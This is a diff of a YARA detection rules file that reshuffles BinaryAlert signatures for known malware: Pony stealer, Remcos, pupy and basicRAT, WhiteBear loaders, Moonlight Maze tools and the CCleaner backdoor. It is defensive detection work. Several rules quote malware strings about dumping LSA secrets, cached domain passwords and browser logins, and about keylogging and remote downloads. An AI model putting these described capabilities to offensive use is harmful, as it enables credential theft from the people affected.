license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e" + logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691" score = 75 - quality = 30 + quality = 80 tags = "" strings: - $a1 = ">> New Session created" wide ascii - $a2 = ">> Session unexpectedly closed" wide ascii - $a3 = ">> Session closed" wide ascii - $a4 = "session unexpectedly closed" wide ascii - $a5 = "cmd" fullword wide ascii - $a6 = "/K" fullword wide ascii - $b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii - $b2 = "ping -n 20 localhost > nul" wide ascii - $b3 = "Downloading file..." wide ascii - $b4 = "Visited Website" wide ascii - $b5 = "Adding Autostart Item failed!" wide ascii - $b6 = ":Zone.Identifier" wide ascii - $c1 = "GetDrives I/O error" wide ascii - $c2 = "/r /t 0" wide ascii - $c3 = "desktop.ini" wide ascii - $c4 = "WAN IP Address" wide ascii - $c5 = "User refused the elevation request." wide ascii - $c6 = "Process already elevated." wide ascii + $a1 = "[!] Private Key Table is not available" wide ascii + $a2 = "[!] Public Key Table is not available" wide ascii + $a3 = "[-] Decrypted Private Key" wide ascii condition: - 5 of ($a*) or 5 of ($b*) or 5 of ($c*) + all of ($a*) } -rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3 +rule BINARYALERT_Malware_Multi_Pupy_Rat { meta: - description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" - author = "@fusionrace" - id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59" + description = "pupy - opensource cross platform rat and post-exploitation tool" + author = "@mimeframe" + id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263" date = "2017-09-12" modified = "2017-09-12" - reference = "https://securelist.com/introducing-whitebear/81638/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16" + reference = "https://github.com/n1nj4sec/pupy" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "b099b82acb860d9a9a571515024b35f0" - logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23" + logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241" score = 75 - quality = 80 + quality = 74 tags = "" strings: - $c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii - $c2 = "IsLoaderAlreadyWork" wide ascii - $c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii - $c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii + $a1 = "dumping lsa secrets" nocase wide ascii + $a2 = "dumping cached domain passwords" nocase wide ascii + $a3 = "the keylogger is already started" nocase wide ascii + $a4 = "pupyutils.dns" wide ascii + $a5 = "pupwinutils.security" wide ascii + $a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii condition: - all of ($c*) + 3 of ($a*) } -import "pe" - -rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE +rule BINARYALERT_Malware_Multi_Vesche_Basicrat { meta: - description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers" - author = "Kaspersky Lab" - id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://www.exploit-db.com/exploits/19274/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20" + description = "cross-platform Python 2.x Remote Access Trojan (RAT)" + author = "@mimeframe" + id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/vesche/basicRAT" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344" + logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29" score = 75 quality = 80 - tags = "FILE" - md5_1 = "008ea82f31f585622353bd47fa1d84be" - md5_2 = "a26bad2b79075f454c83203fa00ed50c" - md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab" - md5_4 = "5937db3896cdd8b0beb3df44e509e136" - md5_5 = "f4ed5170dcea7e5ba62537d84392b280" + tags = "" strings: - $a1 = "stack = 0x%x, targ_addr = 0x%x" - $a2 = "execl failed" + $a1 = "HKCU Run registry key applied" wide ascii + $a2 = "HKCU Run registry key failed" wide ascii + $a3 = "Error, platform unsupported." wide ascii + $a4 = "Persistence successful," wide ascii + $a5 = "Persistence unsuccessful," wide ascii condition: - ( uint32(0)==0x464c457f) and ( all of them ) + all of ($a*) } -rule BINARYALERT_Ccleaner_Backdoor +rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer { meta: - description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection." - author = "@fusionrace" - id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a" - date = "2017-12-14" - modified = "2017-12-14" - reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15" + description = "Rule to detect Moonlight Maze sniffer tools" + author = "Kaspersky Lab" + id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218" + logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f" score = 75 quality = 80 tags = "" - md5_1 = "d488e4b61c233293bec2ee09553d3a2f" - md5_2 = "b95911a69e49544f9ecc427478eb952f" - md5_3 = "063b58879c8197b06d619c3be90506ec" - md5_4 = "7690e414e130acf7c962774c05283142" + md5_1 = "7b86f40e861705d59f5206c482e1f2a5" + md5_2 = "927426b558888ad680829bd34b0ad0e7" strings: - $s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide + $a1 = "/var/tmp/gogo" fullword + $a2 = "myfilename= |%s|" fullword + $a3 = "mypid,mygid=" fullword + $a4 = "mypid=|%d| mygid=|%d|" fullword + $a5 = "/var/tmp/task" fullword + $a6 = "mydevname= |%s|" fullword condition: - $s1 + any of ($a*) } -rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2 +rule BINARYALERT_Malware_Windows_Pony_Stealer { meta: - description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" - author = "@fusionrace" - id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://securelist.com/introducing-whitebear/81638/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17" + description = "Pony stealer malware" + author = "@mimeframe" + id = "77af81cb-36c7-56a7-bd89-14d79628e5c4" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://www.knowbe4.com/pony-stealer" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "06bd89448a10aa5c2f4ca46b4709a879" - logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1" + hash = "5e52ce394c3be2a685dbb8f435e2f64f" + logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261" score = 75 - quality = 80 + quality = 50 tags = "" strings: - $b1 = "i cunt waiting anymore #%d" wide ascii - $b2 = "lights aint turnt off with #%d" wide ascii - $b3 = "Not find process" wide ascii - $b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii - $b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii + $a1 = "signons.sqlite" nocase wide ascii + $a2 = "signons.txt" nocase wide ascii + $a3 = "signons2.txt" nocase wide ascii + $a4 = "signons3.txt" nocase wide ascii + $a5 = "WininetCacheCredentials" nocase wide ascii + $a6 = "moz_logins" nocase wide ascii + $a7 = "encryptedPassword" nocase wide ascii + $a8 = "FlashFXP" nocase wide ascii + $a9 = "BulletProof" nocase wide ascii + $a10 = "CuteFTP" nocase wide ascii condition: - 3 of ($b*) + all of ($a*) } -rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1 +rule BINARYALERT_Malware_Windows_Remcos_Rat { meta: - description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" - author = "@fusionrace" - id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://securelist.com/introducing-whitebear/81638/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22" + description = "No description has been set in the source file - BinaryAlert" + author = "@mimeframe" + id = "420c135f-3150-5cb9-9c1c-105cd260d713" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://breaking-security.net/remcos/remcos-changelog/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "b099b82acb860d9a9a571515024b35f0" - logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c" + hash = "c8dafe143fe1d81ae6a3c0cd4724b272" + logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad" score = 75 quality = 80 tags = "" strings: - $a1 = "### PE STORAGE ###" wide ascii - $a2 = "### CRYPTO 0 ###" wide ascii - $a3 = "### EXTERNAL STORAGE ###" wide ascii - $a4 = "### CRYPTO 1 ###" wide ascii - $a5 = "### QUEUES ###" wide ascii - $a6 = "### TRANSPORT ###" wide ascii - $a7 = "### EXECUTION SUBSYSTEM ###" wide ascii - $a8 = "### AUTORUN MANAGER ###" wide ascii - $a9 = "### INJECT MANAGER ###" wide ascii - $a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii + $a1 = "[Following text has been pasted from clipboard:]" wide ascii + $a2 = "[Chrome StoredLogins found, cleared!]" wide ascii + $a3 = "[Firefox StoredLogins cleared!]" wide ascii + $b1 = "getclipboard" wide ascii + $b2 = "stopmiccapture" wide ascii + $b3 = "downloadfromurltofile" wide ascii + $b4 = "getcamsingleframe" wide ascii + $c1 = "Breaking-Security.Net" wide ascii + $c2 = "REMCOS v" wide ascii condition: - 6 of ($a*) + any of ($a*) or 3 of ($b*) or all of ($c*) } -rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger +rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool { meta: - description = "Rule to detect Moonlight Maze 'xk' keylogger" + description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool" author = "Kaspersky Lab" - id = "5623021d-0d70-59b3-ae30-522e81552da0" + id = "8b943c21-eac7-521d-8dc6-90d611aa4d92" date = "2017-08-11" modified = "2017-08-11" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f" + logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c" score = 75 - quality = 30 + quality = 80 tags = "" + md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703" + md5_2 = "8b56e8552a74133da4bc5939b5f74243" strings: - $a1 = "Log ended at => %s" - $a2 = "Log started at => %s [pid %d]" - $a3 = "/var/tmp/task" fullword - $a4 = "/var/tmp/taskhost" fullword - $a5 = "my hostname: %s" - $a6 = "/var/tmp/tasklog" - $a7 = "/var/tmp/.Xtmp01" fullword - $a8 = "myfilename=-%s-" - $a9 = "/var/tmp/taskpid" - $a10 = "mypid=-%d-" fullword - $a11 = "/var/tmp/taskgid" fullword - $a12 = "mygid=-%d-" fullword + $a1 = "Vnuk: %d" ascii fullword + $a2 = "Syn: %d" ascii fullword + $a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A} condition: - 3 of ($a*) + 2 of ($a*) } -rule BINARYALERT_Malware_Windows_Pony_Stealer +import "pe" + +rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE { meta: - description = "Pony stealer malware" - author = "@mimeframe" - id = "77af81cb-36c7-56a7-bd89-14d79628e5c4" + description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers" + author = "Kaspersky Lab" + id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104" date = "2017-08-11" modified = "2017-08-11" - reference = "https://www.knowbe4.com/pony-stealer" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21" + reference = "https://www.exploit-db.com/exploits/19274/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "5e52ce394c3be2a685dbb8f435e2f64f" - logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261" + logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344" score = 75 - quality = 50 - tags = "" + quality = 80 + tags = "FILE" + md5_1 = "008ea82f31f585622353bd47fa1d84be" + md5_2 = "a26bad2b79075f454c83203fa00ed50c" + md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab" + md5_4 = "5937db3896cdd8b0beb3df44e509e136" + md5_5 = "f4ed5170dcea7e5ba62537d84392b280" strings: - $a1 = "signons.sqlite" nocase wide ascii - $a2 = "signons.txt" nocase wide ascii - $a3 = "signons2.txt" nocase wide ascii - $a4 = "signons3.txt" nocase wide ascii - $a5 = "WininetCacheCredentials" nocase wide ascii - $a6 = "moz_logins" nocase wide ascii - $a7 = "encryptedPassword" nocase wide ascii - $a8 = "FlashFXP" nocase wide ascii - $a9 = "BulletProof" nocase wide ascii - $a10 = "CuteFTP" nocase wide ascii + $a1 = "stack = 0x%x, targ_addr = 0x%x" + $a2 = "execl failed" condition: - all of ($a*) + ( uint32(0)==0x464c457f) and ( all of them ) } -rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki +rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader { meta: - description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings" - author = "Kaspersky Lab" - id = "06eeb6a4-540f-51eb-86f9-4ab49543f645" + description = "Winnti APT group; gzwrite64 imported from loadoerf.ini" + author = "@mimeframe" + id = "41444dd5-41b9-550c-9124-bc7f41326baa" date = "2017-08-11" modified = "2017-08-11" - reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27" + reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f" + hash = "879ce99e253e598a3c156258a9e81457" + logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db" score = 75 quality = 80 tags = "" - md5_1 = "14cce7e641d308c3a177a8abb5457019" - md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea" - md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a" - md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2" - md5_5 = "e59f92aadb6505f29a9f368ab803082e" strings: - $a1 = "Write file Ok..." ascii wide - $a2 = "ERROR: Can not open socket...." ascii wide - $a3 = "Error in parametrs:" ascii wide - $a4 = "Usage: @ " ascii wide - $a5 = "ERROR: Not connect..." ascii wide - $a6 = "Connect successful...." ascii wide - $a7 = "clnt <%d> rqstd n ll kll" ascii wide - $a8 = "clnt <%d> rqstd swap" ascii wide - $a9 = "cld nt sgnl prcs grp" ascii wide - $a10 = "cld nt sgnl prnt" ascii wide - $a11 = "ork error" ascii fullword + $s1 = "loadoerf.ini" fullword ascii wide + $s2 = "gzwrite64" fullword ascii wide condition: - 2 of ($a*) + all of ($s*) } rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool { @@ -116562,6 +118652,33 @@ rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool condition: 3 of ($a*) } +rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto +{ + meta: + description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */" + author = "Costin Raiu, Kaspersky Lab" + id = "eb5fc283-4994-5db5-965d-e90caad95f4c" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c" + score = 75 + quality = 80 + tags = "" + md5_1 = "19fbd8cbfb12482e8020a887d6427315" + md5_2 = "ea06b213d5924de65407e8931b1e4326" + md5_3 = "14ecd5e6fc8e501037b54ca263896a11" + md5_4 = "e079ec947d3d4dacb21e993b760a65dc" + md5_5 = "edf900cebb70c6d1fcab0234062bfc28" + + strings: + $modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49} + + condition: + $modulus +} import "pe" rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE @@ -116590,105 +118707,106 @@ rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE condition: ( uint32(0)==0x464c457f) and ( any of them ) } -rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger +rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3 { meta: - description = "Rule to detect Moonlight Maze encrypted keylogger logs" - author = "Kaspersky Lab" - id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11" + description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" + author = "@fusionrace" + id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://securelist.com/introducing-whitebear/81638/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d" + hash = "b099b82acb860d9a9a571515024b35f0" + logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23" score = 75 quality = 80 tags = "" strings: - $a1 = {47 01 22 2A 6D 3E 39 2C} + $c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii + $c2 = "IsLoaderAlreadyWork" wide ascii + $c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii + $c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii condition: - ($a1 at 0) + all of ($c*) } -rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader +rule BINARYALERT_Ccleaner_Backdoor { meta: - description = "Winnti APT group; gzwrite64 imported from loadoerf.ini" - author = "@mimeframe" - id = "41444dd5-41b9-550c-9124-bc7f41326baa" - date = "2017-08-11" - modified = "2017-08-11" - reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13" + description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection." + author = "@fusionrace" + id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a" + date = "2017-12-14" + modified = "2017-12-14" + reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "879ce99e253e598a3c156258a9e81457" - logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db" + logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218" score = 75 quality = 80 tags = "" + md5_1 = "d488e4b61c233293bec2ee09553d3a2f" + md5_2 = "b95911a69e49544f9ecc427478eb952f" + md5_3 = "063b58879c8197b06d619c3be90506ec" + md5_4 = "7690e414e130acf7c962774c05283142" strings: - $s1 = "loadoerf.ini" fullword ascii wide - $s2 = "gzwrite64" fullword ascii wide + $s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide condition: - all of ($s*) + $s1 } -rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool +rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2 { meta: - description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool" - author = "Kaspersky Lab" - id = "8b943c21-eac7-521d-8dc6-90d611aa4d92" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16" + description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" + author = "@fusionrace" + id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://securelist.com/introducing-whitebear/81638/" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "836331856200fde9792d3bf97d3a18b7f4497ceaae1cfceb0de7c2949e315b9c" + hash = "06bd89448a10aa5c2f4ca46b4709a879" + logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1" score = 75 quality = 80 tags = "" - md5_1 = "4bc7ed168fb78f0dc688ee2be20c9703" - md5_2 = "8b56e8552a74133da4bc5939b5f74243" strings: - $a1 = "Vnuk: %d" ascii fullword - $a2 = "Syn: %d" ascii fullword - $a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A} + $b1 = "i cunt waiting anymore #%d" wide ascii + $b2 = "lights aint turnt off with #%d" wide ascii + $b3 = "Not find process" wide ascii + $b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii + $b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii condition: - 2 of ($a*) + 3 of ($b*) } -import "pe" - -rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE +rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger { meta: - description = "Rule to detect log cleaner based on wipe.c" + description = "Rule to detect Moonlight Maze encrypted keylogger logs" author = "Kaspersky Lab" - id = "35060c3d-b805-54a6-a241-eb6e99168fa8" + id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63" date = "2017-08-11" modified = "2017-08-11" - reference = "http://www.afn.org/~afn28925/wipe.c" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18" + reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "e69efc504934551c6a77b525d5343241" - logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675" + logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d" score = 75 quality = 80 - tags = "FILE" + tags = "" strings: - $a1 = "ERROR: Unlinking tmp WTMP file." - $a2 = "USAGE: wipe [ u|w|l|a ] ...options..." - $a3 = "Erase acct entries on tty : wipe a [username] [tty]" - $a4 = "Alter lastlog entry : wipe l [username] [tty] [time] [host]" + $a1 = {47 01 22 2A 6D 3E 39 2C} condition: - ( uint32(0)==0x464c457f) and (2 of them ) + ($a1 at 0) } rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat { @@ -116720,114 +118838,211 @@ rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat condition: all of ($a*) } -rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto +rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1 { meta: - description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */" - author = "Costin Raiu, Kaspersky Lab" - id = "eb5fc283-4994-5db5-965d-e90caad95f4c" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16" + description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts" + author = "@fusionrace" + id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://securelist.com/introducing-whitebear/81638/" + source_url = 